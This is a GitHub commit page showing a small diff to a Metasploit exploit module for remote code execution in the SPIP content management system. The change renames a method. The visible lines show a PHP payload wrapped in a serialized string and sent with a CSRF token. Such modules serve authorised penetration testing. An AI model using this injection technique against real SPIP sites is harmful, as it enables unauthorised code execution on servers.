We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 8024533 commit b8a1d40Copy full SHA for b8a1d40
modules/exploits/multi/http/spip_rce_form.rb
@@ -96,7 +96,7 @@ def check
96
return Exploit::CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
97
end
98
99
- def execute_command(cmd, args = {})
+ def send_payload(cmd, args = {})
100
send_request_cgi(
101
{
102
'uri' => args['uri'],
@@ -143,6 +143,6 @@ def exploit
143
final_payload = "<?php #{phped_payload} ?>"
144
oubli = "s:#{final_payload.length}:\"#{final_payload}\";"
145
146
- execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })
+ send_payload(oubli, { 'uri' => uri, 'csrf' => csrf })
147
148
0 commit comments